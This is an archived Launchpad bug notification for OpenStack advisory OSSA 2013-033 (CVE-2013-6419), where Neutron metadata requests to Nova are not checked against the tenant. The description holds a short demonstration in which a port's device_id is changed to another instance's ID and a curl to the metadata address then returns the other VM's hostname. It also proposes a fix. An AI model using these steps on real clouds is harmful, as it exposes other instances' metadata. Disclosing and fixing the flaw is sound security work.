← Back to team overview

yahoo-eng-team team mailing list archive

[Bug 1235450] Re: [OSSA 2013-033] Metadata queries from Neutron to Nova are not restricted by tenant (CVE-2013-6419)

 

** Changed in: neutron/havana
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1235450

Title:
  [OSSA 2013-033] Metadata queries from Neutron to Nova are not
  restricted by tenant (CVE-2013-6419)

Status in OpenStack Neutron (virtual network service):
  Fix Committed
Status in neutron grizzly series:
  Fix Committed
Status in neutron havana series:
  Fix Released
Status in OpenStack Compute (Nova):
  Fix Committed
Status in OpenStack Compute (nova) grizzly series:
  In Progress
Status in OpenStack Compute (nova) havana series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Committed

Bug description:
  The neutron metadata service works in the following way:

  Instance makes a GET request to http://169.254.169.254/

  This is directed to the metadata-agent which knows which
  router(namespace) he is running on and determines the ip_address from
  the http request he receives.

  Now, the neturon-metadata-agent queries neutron-server  using the
  router_id and ip_address from the request to determine the port the
  request came from. Next, the agent takes the device_id (nova-instance-
  id) on the port and passes that to nova as X-Instance-ID.

  The vulnerability is that if someone exposes their instance_id their
  metadata can be retrieved. In order to exploit this, one would need to
  update the device_id  on a port to match the instance_id they want to
  hijack the data from.

  To demonstrate:

  arosen@arosen-desktop:~/devstack$ nova list
  +--------------------------------------+------+--------+------------+-------------+------------------+
  | ID                                   | Name | Status | Task State | Power State | Networks         |
  +--------------------------------------+------+--------+------------+-------------+------------------+
  | 1eb33bf1-6400-483a-9747-e19168b68933 | vm1  | ACTIVE | None       | Running     | private=10.0.0.4 |
  | eed973e2-58ea-42c4-858d-582ff6ac3a51 | vm2  | ACTIVE | None       | Running     | private=10.0.0.3 |
  +--------------------------------------+------+--------+------------+-------------+------------------+

  
  arosen@arosen-desktop:~/devstack$ neutron port-list
  +--------------------------------------+------+-------------------+---------------------------------------------------------------------------------+
  | id                                   | name | mac_address       | fixed_ips                                                                       |
  +--------------------------------------+------+-------------------+---------------------------------------------------------------------------------+
  | 3128f195-c41b-4160-9a42-40e024771323 |      | fa:16:3e:7d:a5:df | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.1"} |
  | 62465157-8494-4fb7-bdce-2b8697f03c12 |      | fa:16:3e:94:62:47 | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.4"} |
  | 8473fb8d-b649-4281-b03a-06febf61b400 |      | fa:16:3e:4f:a3:b0 | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.2"} |
  | 92c42c1a-efb0-46a6-89eb-a38ae170d76d |      | fa:16:3e:de:9a:39 | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.3"} |
  +--------------------------------------+------+-------------------+---------------------------------------------------------------------------------+

  
  arosen@arosen-desktop:~/devstack$ neutron port-show  62465157-8494-4fb7-bdce-2b8697f03c12
  +-----------------------+---------------------------------------------------------------------------------+
  | Field                 | Value                                                                           |
  +-----------------------+---------------------------------------------------------------------------------+
  | admin_state_up        | True                                                                            |
  | allowed_address_pairs |                                                                                 |
  | device_id             | 1eb33bf1-6400-483a-9747-e19168b68933                                            |
  | device_owner          | compute:None                                                                    |
  | extra_dhcp_opts       |                                                                                 |
  | fixed_ips             | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.4"} |
  | id                    | 62465157-8494-4fb7-bdce-2b8697f03c12                                            |
  | mac_address           | fa:16:3e:94:62:47                                                               |
  | name                  |                                                                                 |
  | network_id            | 5f68c45d-b729-4e21-9ded-089848eb4ef2                                            |
  | security_groups       | 3e29d8e7-0195-4438-a49a-9706736b888d                                            |
  | status                | ACTIVE                                                                          |
  | tenant_id             | 0f9d696fc73d4110ab492ca105881b9b                                                |
  +-----------------------+---------------------------------------------------------------------------------+

  arosen@arosen-desktop:~/devstack$ neutron port-show  92c42c1a-efb0-46a6-89eb-a38ae170d76d
  +-----------------------+---------------------------------------------------------------------------------+
  | Field                 | Value                                                                           |
  +-----------------------+---------------------------------------------------------------------------------+
  | admin_state_up        | True                                                                            |
  | allowed_address_pairs |                                                                                 |
  | device_id             | eed973e2-58ea-42c4-858d-582ff6ac3a51                                            |
  | device_owner          | compute:None                                                                    |
  | extra_dhcp_opts       |                                                                                 |
  | fixed_ips             | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.3"} |
  | id                    | 92c42c1a-efb0-46a6-89eb-a38ae170d76d                                            |
  | mac_address           | fa:16:3e:de:9a:39                                                               |
  | name                  |                                                                                 |
  | network_id            | 5f68c45d-b729-4e21-9ded-089848eb4ef2                                            |
  | security_groups       | 3e29d8e7-0195-4438-a49a-9706736b888d                                            |
  | status                | ACTIVE                                                                          |
  | tenant_id             | 0f9d696fc73d4110ab492ca105881b9b                                                |
  +-----------------------+---------------------------------------------------------------------------------+

  From vm2 (eed973e2-58ea-42c4-858d-582ff6ac3a51): 
  $ curl http://169.254.169.254/latest/meta-data/hostname
  vm2.novalocal

  arosen@arosen-desktop:~/devstack$ neutron port-update 92c42c1a-
  efb0-46a6-89eb-a38ae170d76d
  --device_id=1eb33bf1-6400-483a-9747-e19168b68933

   From vm2 (eed973e2-58ea-42c4-858d-582ff6ac3a51): 
  $ curl http://169.254.169.254/latest/meta-data/hostname
  vm1.novalocal

  
  In order to fix this issue I believe we need to also pass the tenant-id in the metadata request to nova. When nova receives the request it will now have to query it's database using the instance_id and check that the tenant_id's match. Using the tenant_id solves this issue as the user is not allowed to specify or update this field.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1235450/+subscriptions